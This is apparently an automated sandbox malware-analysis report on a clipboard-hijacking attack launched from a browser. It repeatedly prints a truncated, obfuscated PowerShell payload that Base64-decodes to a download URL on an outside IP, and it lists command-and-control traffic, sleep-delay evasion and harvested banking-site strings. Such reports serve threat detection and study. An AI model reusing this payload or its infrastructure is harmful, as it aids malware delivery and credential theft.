          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeClipboard modification: $e5W2n8J3 = [Convert]::FromBase64String('aHR0cDovLzc0LjIwOC4xOTUuMTg4OjU5MjcvcGF5bG9hZA==') $e8K4p1T9 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUtleQ==') $e2R7v6F5 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUlW') $e9J3m4Q2 = [Convert]::
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeClipboard modification: $e5W2n8J3 = [Convert]::FromBase64String('aHR0cDovLzc0LjIwOC4xOTUuMTg4OjU5MjcvcGF5bG9hZA==') $e8K4p1T9 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUtleQ==') $e2R7v6F5 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUlW') $e9J3m4Q2 = [Convert]::
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeClipboard modification: $e5W2n8J3 = [Convert]::FromBase64String('aHR0cDovLzc0LjIwOC4xOTUuMTg4OjU5MjcvcGF5bG9hZA==') $e8K4p1T9 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUtleQ==') $e2R7v6F5 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUlW') $e9J3m4Q2 = [Convert]::
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeClipboard modification: $e5W2n8J3 = [Convert]::FromBase64String('aHR0cDovLzc0LjIwOC4xOTUuMTg4OjU5MjcvcGF5bG9hZA==') $e8K4p1T9 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUtleQ==') $e2R7v6F5 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUlW') $e9J3m4Q2 = [Convert]::
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeClipboard modification: $e5W2n8J3 = [Convert]::FromBase64String('aHR0cDovLzc0LjIwOC4xOTUuMTg4OjU5MjcvcGF5bG9hZA==') $e8K4p1T9 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUtleQ==') $e2R7v6F5 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUlW') $e9J3m4Q2 = [Convert]::
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeClipboard modification: $e5W2n8J3 = [Convert]::FromBase64String('aHR0cDovLzc0LjIwOC4xOTUuMTg4OjU5MjcvcGF5bG9hZA==') $e8K4p1T9 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUtleQ==') $e2R7v6F5 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUlW') $e9J3m4Q2 = [Convert]::
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeClipboard modification: $e5W2n8J3 = [Convert]::FromBase64String('aHR0cDovLzc0LjIwOC4xOTUuMTg4OjU5MjcvcGF5bG9hZA==') $e8K4p1T9 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUtleQ==') $e2R7v6F5 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUlW') $e9J3m4Q2 = [Convert]::
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeClipboard modification: $e5W2n8J3 = [Convert]::FromBase64String('aHR0cDovLzc0LjIwOC4xOTUuMTg4OjU5MjcvcGF5bG9hZA==') $e8K4p1T9 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUtleQ==') $e2R7v6F5 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUlW') $e9J3m4Q2 = [Convert]::
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeClipboard modification: $e5W2n8J3 = [Convert]::FromBase64String('aHR0cDovLzc0LjIwOC4xOTUuMTg4OjU5MjcvcGF5bG9hZA==') $e8K4p1T9 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUtleQ==') $e2R7v6F5 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUlW') $e9J3m4Q2 = [Convert]::
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeClipboard modification: $e5W2n8J3 = [Convert]::FromBase64String('aHR0cDovLzc0LjIwOC4xOTUuMTg4OjU5MjcvcGF5bG9hZA==') $e8K4p1T9 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUtleQ==') $e2R7v6F5 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUlW') $e9J3m4Q2 = [Convert]::
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeClipboard modification: $e5W2n8J3 = [Convert]::FromBase64String('aHR0cDovLzc0LjIwOC4xOTUuMTg4OjU5MjcvcGF5bG9hZA==') $e8K4p1T9 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUtleQ==') $e2R7v6F5 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUlW') $e9J3m4Q2 = [Convert]::
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeClipboard modification: $e5W2n8J3 = [Convert]::FromBase64String('aHR0cDovLzc0LjIwOC4xOTUuMTg4OjU5MjcvcGF5bG9hZA==') $e8K4p1T9 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUtleQ==') $e2R7v6F5 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUlW') $e9J3m4Q2 = [Convert]::
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeClipboard modification: $e5W2n8J3 = [Convert]::FromBase64String('aHR0cDovLzc0LjIwOC4xOTUuMTg4OjU5MjcvcGF5bG9hZA==') $e8K4p1T9 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUtleQ==') $e2R7v6F5 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUlW') $e9J3m4Q2 = [Convert]::
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeClipboard modification: $e5W2n8J3 = [Convert]::FromBase64String('aHR0cDovLzc0LjIwOC4xOTUuMTg4OjU5MjcvcGF5bG9hZA==') $e8K4p1T9 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUtleQ==') $e2R7v6F5 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUlW') $e9J3m4Q2 = [Convert]::
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeClipboard modification: $e5W2n8J3 = [Convert]::FromBase64String('aHR0cDovLzc0LjIwOC4xOTUuMTg4OjU5MjcvcGF5bG9hZA==') $e8K4p1T9 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUtleQ==') $e2R7v6F5 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUlW') $e9J3m4Q2 = [Convert]::
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeClipboard modification: $e5W2n8J3 = [Convert]::FromBase64String('aHR0cDovLzc0LjIwOC4xOTUuMTg4OjU5MjcvcGF5bG9hZA==') $e8K4p1T9 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUtleQ==') $e2R7v6F5 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUlW') $e9J3m4Q2 = [Convert]::
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeClipboard modification: $e5W2n8J3 = [Convert]::FromBase64String('aHR0cDovLzc0LjIwOC4xOTUuMTg4OjU5MjcvcGF5bG9hZA==') $e8K4p1T9 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUtleQ==') $e2R7v6F5 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUlW') $e9J3m4Q2 = [Convert]::
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeClipboard modification: $e5W2n8J3 = [Convert]::FromBase64String('aHR0cDovLzc0LjIwOC4xOTUuMTg4OjU5MjcvcGF5bG9hZA==') $e8K4p1T9 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUtleQ==') $e2R7v6F5 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUlW') $e9J3m4Q2 = [Convert]::
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeClipboard modification: $e5W2n8J3 = [Convert]::FromBase64String('aHR0cDovLzc0LjIwOC4xOTUuMTg4OjU5MjcvcGF5bG9hZA==') $e8K4p1T9 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUtleQ==') $e2R7v6F5 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUlW') $e9J3m4Q2 = [Convert]::
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeClipboard modification: $e5W2n8J3 = [Convert]::FromBase64String('aHR0cDovLzc0LjIwOC4xOTUuMTg4OjU5MjcvcGF5bG9hZA==') $e8K4p1T9 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUtleQ==') $e2R7v6F5 = [Convert]::FromBase64String('WC1FbmNyeXB0aW9uLUlW') $e9J3m4Q2 = [Convert]::

          Hooking and other Techniques for Hiding and Protection

          barindex
          Uses known network protocols on non-standard ports
          Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 5927
          Source: unknownNetwork traffic detected: HTTP traffic on port 5927 -> 49809
          Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 5927
          Source: unknownNetwork traffic detected: HTTP traffic on port 5927 -> 49893
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3313Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6501Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6936Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: Web Data.18.drBinary or memory string: ms.portal.azure.comVMware20,11696586537
          Source: Web Data.18.drBinary or memory string: account.microsoft.com/profileVMware20,11696586537u
          Source: Web Data.18.drBinary or memory string: AMC password management pageVMware20,11696586537
          Source: Web Data.18.drBinary or memory string: turbotax.intuit.comVMware20,11696586537t
          Source: Web Data.18.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696586537
          Source: Web Data.18.drBinary or memory string: discord.comVMware20,11696586537f
          Source: Web Data.18.drBinary or memory string: dev.azure.comVMware20,11696586537j
          Source: Web Data.18.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696586537
          Source: Web Data.18.drBinary or memory string: Canara Transaction PasswordVMware20,11696586537x
          Source: Web Data.18.drBinary or memory string: tasks.office.comVMware20,11696586537o
          Source: Web Data.18.drBinary or memory string: bankofamerica.comVMware20,11696586537x
          Source: Web Data.18.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696586537
          Source: Web Data.18.drBinary or memory string: netportal.hdfcbank.comVMware20,11696586537
          Source: Web Data.18.drBinary or memory string: interactivebrokers.comVMware20,11696586537
          Source: Web Data.18.drBinary or memory string: trackpan.utiitsl.comVMware20,11696586537h
          Source: Web Data.18.drBinary or memory string: global block list test formVMware20,11696586537
          Source: Web Data.18.drBinary or memory string: secure.bankofamerica.comVMware20,11696586537|UE
          Source: Web Data.18.drBinary or memory string: Interactive Brokers - HKVMware20,11696586537]
          Source: Web Data.18.drBinary or memory string: interactivebrokers.co.inVMware20,11696586537d
          Source: Web Data.18.drBinary or memory string: Canara Transaction PasswordVMware20,11696586537}
          Source: Web Data.18.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696586537
          Source: Web Data.18.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696586537p
          Source: Web Data.18.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696586537z
          Source: Web Data.18.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696586537n
          Source: Web Data.18.drBinary or memory string: outlook.office.comVMware20,11696586537s
          Source: Web Data.18.drBinary or memory string: www.interactivebrokers.comVMware20,11696586537}
          Source: Web Data.18.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696586537
          Source: Web Data.18.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696586537^
          Source: Web Data.18.drBinary or memory string: microsoft.visualstudio.comVMware20,11696586537x
          Source: Web Data.18.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696586537~
          Source: Web Data.18.drBinary or memory string: outlook.office365.comVMware20,11696586537t
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Yara detected Powershell download and execute
          Source: Yara matchFile source: dropped/chromecache_806, type: DROPPED
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
